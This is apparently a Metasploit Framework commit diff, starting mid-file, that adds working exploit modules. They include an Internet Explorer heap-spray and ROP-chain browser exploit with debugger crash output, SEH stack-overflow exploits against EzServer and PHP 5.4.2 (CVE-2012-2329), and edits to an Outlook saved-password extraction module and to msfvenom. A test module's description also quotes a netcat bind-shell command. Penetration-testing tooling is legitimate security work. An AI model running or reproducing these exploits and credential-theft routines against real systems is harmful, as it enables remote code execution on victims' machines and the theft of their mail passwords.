+ 0x77c46101, # ROP NOP (-> edi)
+ 0x77c4d680, # POP EDX # RETN
+ 0x00000040, # newProtect (0x40) (-> edx)
+ 0x77c4e392, # POP EAX # RETN
+ nop, # NOPS (-> eax)
+ 0x77c12df9, # PUSHAD # RETN
+ ].pack("V*")
+
+ when :jre
+ print_status("Using JRE ROP")
+ rop =
+ [
+ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+ 0x00001000, # (dwSize)
+ 0x7c347f98, # RETN (ROP NOP)
+ 0x7c3415a2, # JMP [EAX]
+ 0xffffffff,
+ 0x7c376402, # skip 4 bytes
+ 0x7c345255, # INC EBX # FPATAN # RETN
+ 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+ 0x7c344f87, # POP EDX # RETN
+ 0x00000040, # flNewProtect
+ 0x7c34d201, # POP ECX # RETN
+ 0x7c38b001, # &Writable location
+ 0x7c347f97, # POP EAX # RETN
+ 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+ 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
+ 0x7c345c30, # ptr to 'push esp # ret '
+ ].pack("V*")
+ end
+
+ code = adjust
+ code << rop
+ return code
+ end
+
+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if the victim doesn't have the same setup we're targeting
+ if my_target.nil?
+ print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
+ send_not_found(cli)
+ return
+ end
+
+ p = payload.encoded
+ js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
+ js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+ js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+
+ if my_target['Rop'].nil?
+ js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
+ else
+ js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
+ js_shellcode = <<-JS_ROP
+ var rop_chain = unescape("#{js_rop}");
+ var nops_padding = nops.substring(0, #{my_target['RopChainOffset']}-code.length-offset.length);
+ var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
+ JS_ROP
+ js_shellcode = js_shellcode.gsub(/^\t\t\t/, '')
+ end
+
+ js = <<-JS
+ var heap_obj = new heapLib.ie(0x20000);
+ var code = unescape("#{js_code}");
+ var nops = unescape("#{js_nops}");
+ var nops_90 = unescape("#{js_90_nops}");
+
+ while (nops.length < 0x80000) nops += nops;
+ while (nops_90.length < 0x80000) nops_90 += nops_90;
+
+ var offset = nops.substring(0, #{my_target['Offset']});
+ #{js_shellcode}
+
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+ heap_obj.gc();
+ for (var z=1; z < 0x230; z++) {
+ heap_obj.alloc(block);
+ }
+
+ JS
+
+ js = heaplib(js, {:noobfu => true})
+
+ object_id = rand_text_alpha(4)
+
+ js_trigger = <<-TRIGGER
+ var obj = document.getElementById('#{object_id}').object;
+ var src = unescape("%u0c08%u0c0c");
+ while (src.length < 0x1002) src += src;
+ src = "\\\\\\\\xxx" + src;
+ src = src.substr(0, 0x1000 - 10);
+ var pic = document.createElement("img");
+ pic.src = src;
+ pic.nameProp;
+ obj.definition(1000);
+ TRIGGER
+
+ js_trigger = heaplib(js_trigger, {:noobfu => true})
+
+ if datastore['OBFUSCATE']
+ js = ::Rex::Exploitation::JSObfu.new(js)
+ js.obfuscate
+ js_trigger =::Rex::Exploitation::JSObfu.new(js_trigger)
+ js_trigger.obfuscate
+ end
+
+ html = <<-EOS
+ <html>
+ <head>
+ <script>
+ #{js}
+ </script>
+ </head>
+ <body>
+ <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
+ <script>
+ #{js_trigger}
+ </script>
+ </body>
+ </html>
+ EOS
+
+ html = html.gsub(/^\t\t/, '')
+
+ print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+
+ end
+
+end
+
+=begin
+(e34.358): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
+eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+msxml3!_dispatchImpl::InvokeHelper+0xb4:
+749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????
+
+
+0:008> r
+eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
+eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+msxml3!_dispatchImpl::InvokeHelper+0xb4:
+749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????
+0:008> k
+ChildEBP RetAddr
+020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
+020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
+020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
+020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
+020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
+020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d
+020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
+020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
+020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
+020bf590 633a77ff jscript!VAR::InvokeByName+0x135
+020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
+020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
+020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
+020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
+020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
+020bf958 633891f1 jscript!CSession::Execute+0x175
+020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
+020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
+020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
+020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219
+
+=end
View
2 modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'ComSndFTP v1.3.7 Beta USER Buffer Overflow',
+ 'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
'Description' => %q{
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
crafted format string specifier as a username. The crafted username is sent to to the server to
View
89 modules/exploits/windows/http/ezserver_http.rb
@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Egghunter
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious
+ user sends packets containing an overly long string, it may be possible to execute a
+ payload remotely. Due to size constraints, this module uses the Egghunter technique.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '19266' ],
+ [ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'seh'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',
+ {
+ 'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll
+ 'Offset' => 5852
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jun 18 2012',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(8000)], self.class)
+
+ end
+
+ def exploit
+ connect
+ eggoptions =
+ {
+ :checksum => true,
+ :eggtag => "w00t"
+ }
+
+ hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
+ egg = hunter[1]
+ buff = rand_text(target['Offset'] - egg.length) #junk
+ buff << egg
+ buff << make_nops(32)
+ buff << generate_seh_record(target.ret)
+ buff << make_nops(16)
+ buff << hunter[0]
+ buff << rand_text_alpha_upper(500)
+
+ print_status("Triggering shellcode now...")
+ print_status("Please be patient, the egghunter may take a while..")
+
+ sock.put(buff)
+
+ handler
+ disconnect
+
+ end
+end
View
121 modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -0,0 +1,121 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PHP apache_request_headers Function Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in the CGI version of PHP
+ 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the
+ HTTP headers.
+
+ This module has been tested against the thread safe version of PHP 5.4.2,
+ from "windows.php.net", running with Apache 2.2.22 from "apachelounge.com".
+ },
+ 'Author' =>
+ [
+ 'Vincent Danen', # Vulnerability discovery
+ 'juan vazquez', # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2012-2329'],
+ [ 'OSVDB', '82215'],
+ [ 'BID', '53455'],
+ [ 'URL', 'http://www.php.net/archive/2012.php#id2012-05-08-1' ],
+ [ 'URL', 'http://www.php.net/ChangeLog-5.php#5.4.3'],
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=820000' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 1321,
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x0d\x0a\x5f\x80\x8e\x9e\x9f" + (0x41..0x5a).to_a.pack("C*") + (0x82..0x8c).to_a.pack("C*") + (0x91..0x9c).to_a.pack("C*"),
+ 'EncoderType' => Msf::Encoder::Type::NonUpperUnderscoreSafe,
+ 'EncoderOptions' =>
+ {
+ 'BufferOffset' => 0x0
+ }
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
+ {
+ 'Ret' => 0x1002aa79, # ppr from php5ts.dll
+ 'Offset' => 1332
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'May 08 2012'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to the php using apache_request_headers', '/php/test.php']),
+ ], self.class)
+
+ end
+
+ def exploit
+ print_status("Trying target #{target.name}...")
+
+ # Make ECX point to the start of the encoded payload
+ align_ecx = "pop esi\n" # "\x5e"
+ esi_alignment = target['Offset'] + # Space from the start of align_ecx to nseh handler
+ 8 + # len(nseh + seh)
+ 5 - # len(call back)
+ 11 # len(align_ecx)
+ align_ecx << "add esi, -#{esi_alignment}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
+ align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
+ align_ecx << "add ecx, esi" # "\x01\xf1"
+ sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
+ # Encoded payload
+ sploit << payload.encoded
+ # Padding if needed
+ sploit << rand_text(target['Offset']-sploit.length)
+ # SEH handler overwrite
+ sploit << generate_seh_record(target.ret)
+ # Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
+ sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string
+ # Make it crash
+ sploit << rand_text(4096 - sploit.length)
+
+ print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
+
+ res = send_request_cgi({
+ 'uri' => target_uri.to_s,
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ "HTTP_X_#{rand_text_alpha_lower(4)}" => sploit,
+ }
+ })
+
+ if res and res.code == 500
+ print_status "We got a 500 error code. Even without a session it could be an exploitation signal!"
+ end
+
+ handler
+ end
+end
+
View
35 modules/post/windows/gather/credentials/outlook.rb
@@ -1,4 +1,4 @@
-# $Id$
+# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $
##
# This file is part of the Metasploit Framework and may be subject to
@@ -22,16 +22,16 @@ def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Microsoft Outlook Saved Password Extraction',
'Description' => %q{
- This module extracts and attempts to decrypt saved Microsoft
+ This module extracts and decrypts saved Microsoft
Outlook (versions 2002-2010) passwords from the Windows
Registry for POP3/IMAP/SMTP/HTTP accounts.
In order for decryption to be successful, this module must be
- executed with the same privileges as the user which originally
+ executed under the same privileges as the user which originally
encrypted the password.
},
'License' => MSF_LICENSE,
'Author' => [ 'Justin Cacak'],
- 'Version' => '$Revision$',
+ 'Version' => '$Revision: 14835 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
@@ -113,6 +113,7 @@ def get_registry
if smtp_use_auth != nil
smtp_user = get_valdata(k, 'SMTP User')
smtp_password = get_valdata(k, 'SMTP Password')
+ smtp_auth_method = get_valdata(k, 'SMTP Auth Method')
end
if pop3_server != nil
@@ -126,7 +127,7 @@ def get_registry
end
#Decrypt password and output results. Need to do each separately due to the way Microsoft stores them.
- print_status("Account Found:")
+ print_good("Account Found:")
print_status(" Type: #{type}")
print_status(" User Display Name: #{displayname}")
print_status(" User E-mail Address: #{email}")
@@ -172,16 +173,22 @@ def get_registry
portnum = pop3_port
end
- if smtp_use_auth == nil # Account for SMTP servers requiring authentication
+ if smtp_use_auth == nil # Account for SMTP servers requiring authentication
print_status(" Outgoing Mail Server (SMTP): #{smtp_server}")
else
print_status(" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]")
+ # Check if smtp_auth_method is null. If so, the inbound credentials are utilized
+ if smtp_auth_method == nil
+ smtp_user = pop3_user
+ smtp_decrypted_password = pass
+ else
+ smtp_password.slice!(0,1)
+ smtp_decrypted_password = decrypt_password(smtp_password)
+ end
print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
- smtp_password.slice!(0,1)
- smtp_decrypted_password = decrypt_password(smtp_password)
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
-
+
smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
@@ -271,9 +278,15 @@ def get_registry
print_status(" Outgoing Mail Server (SMTP): #{smtp_server}")
else
print_status(" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]")
+ # Check if smtp_auth_method is null. If so, the inbound credentials are utilized
+ if smtp_auth_method == nil
+ smtp_user = imap_user
+ smtp_decrypted_password = pass
+ else
+ smtp_password.slice!(0,1)
+ smtp_decrypted_password = decrypt_password(smtp_password)
+ end
print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
- smtp_password.slice!(0,1)
- smtp_decrypted_password = decrypt_password(smtp_password)
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
View
57 msfvenom
@@ -13,15 +13,11 @@ require 'fastlib'
require 'msfenv'
-
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
Status = "[*] "
Error = "[-] "
-require 'rex'
-require 'msf/ui'
-require 'msf/base'
require 'optparse'
def parse_args
@@ -51,8 +47,7 @@ def parse_args
opts[:nopsled] = n.to_i
end
- formats = Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
- opt.on('-f', '--format [format]', String, "Format to output results in: #{formats.join(', ')}") do |f|
+ opt.on('-f', '--format [format]', String, "Output format (use --help-formats for a list)") do |f|
opts[:format] = f
end
@@ -65,16 +60,16 @@ def parse_args
opts[:arch] = a
end
- opt.on('', '--platform [platform]', String, 'The platform of the payload') do |l|
- opts[:platform] = Msf::Module::PlatformList.transform(l)
+ opt.on('--platform [platform]', String, 'The platform of the payload') do |l|
+ opts[:platform] = l
end
opt.on('-s', '--space [length]', Integer, 'The maximum size of the resulting payload') do |s|
opts[:space] = s
end
opt.on('-b', '--bad-chars [list] ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
- opts[:badchars] = Rex::Text.hex_to_raw(b)
+ opts[:badchars] = b
end
opt.on('-i', '--iterations [count] ', Integer, 'The number of times to encode the payload') do |i|
@@ -96,8 +91,8 @@ def parse_args
opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do
opts[:inject] = true
end
-
- opt.on('-o', '--options', 'List the payload\'s standard options') do
+
+ opt.on('-o', '--options', "List the payload's standard options") do
opts[:list_options] = true
end
@@ -106,9 +101,23 @@ def parse_args
exit(1)
end
+ opt.on_tail('--help-formats', String, "List available formats") do
+ require 'rex'
+ require 'msf/ui'
+ require 'msf/base'
+ $framework = Msf::Simple::Framework.create(
+ :module_types => [],
+ 'DisableDatabase' => true
+ )
+ puts "Executable formats"
+ puts "\t" + Msf::Util::EXE.to_executable_fmt_formats.join(", ")
+ puts "Transform formats"
+ puts "\t" + Msf::Simple::Buffer.transform_formats.join(", ")
+ exit 1
+ end
+
begin
opt.parse!
-
rescue OptionParser::InvalidOption, OptionParser::MissingArgument
puts "Invalid option, try -h for usage"
exit(1)
@@ -243,7 +252,11 @@ end
datastore, opts = parse_args
-$framework = Msf::Simple::Framework.create(
+require 'rex'
+require 'msf/ui'
+require 'msf/base'
+
+$framework ||= Msf::Simple::Framework.create(
:module_types => [Msf::MODULE_PAYLOAD, Msf::MODULE_ENCODER, Msf::MODULE_NOP],
'DisableDatabase' => true
)
@@ -282,22 +295,32 @@ if opts[:payload]
exit
end
if opts[:list_options]
- print_status("Options for #{payload.fullname}\n\n" +
+ print_status("Options for #{payload.fullname}\n\n" +
::Msf::Serializer::ReadableText.dump_options(payload,' '))
exit
end
end
end
+
+# Normalize the options
+opts[:platform] = Msf::Module::PlatformList.transform(opts[:platform]) if opts[:platform]
+opts[:badchars] = Rex::Text.hex_to_raw(opts[:badchars]) if opts[:badchars]
+
# set the defaults unless something is already set by the user
if opts[:payload] != 'stdin'
opts[:arch] ||= payload.arch[0]
opts[:platform] ||= payload.platform.platforms
else
# defaults for stdin payloads users should define them
- print_error("Using X86 architecture and Windows platform for stdin payload to change use -a and --platform")
- opts[:arch] ||= "x86"
- opts[:platform] ||= Msf::Module::PlatformList.transform("Windows")
+ unless opts[:arch]
+ print_error("Defaulting to x86 architecture for stdin payload, use -a to change")
+ opts[:arch] = "x86"
+ end
+ unless opts[:platform]
+ print_error("Defaulting to Windows platform for stdin payload, use --platform to change")
+ opts[:platform] = Msf::Module::PlatformList.transform("Windows")
+ end
end
opts[:format] ||= 'ruby'
View
60 test/modules/exploits/test/shell.rb
@@ -0,0 +1,60 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Command Test',
+ 'Description' => %q{
+ This module tests cmd payloads by targeting (for example) a server
+ like: nc -l -p 31337 -e /bin/sh
+ },
+ 'Author' => 'egypt',
+ 'Version' => '$Revision$',
+ 'References' => [ ],
+ 'DefaultOptions' => { },
+ 'Payload' =>
+ {
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ [ 'Automatic Targeting', { } ],
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(31337),
+ ], self.class)
+ end
+
+ def autofilter
+ false
+ end
+
+ def exploit
+ connect
+
+ sock.put(payload.encoded + "\n")
+
+ handler
+ end
+
+end

0 comments on commit d8f9bfb

Please sign in to comment.
Something went wrong with that request. Please try again.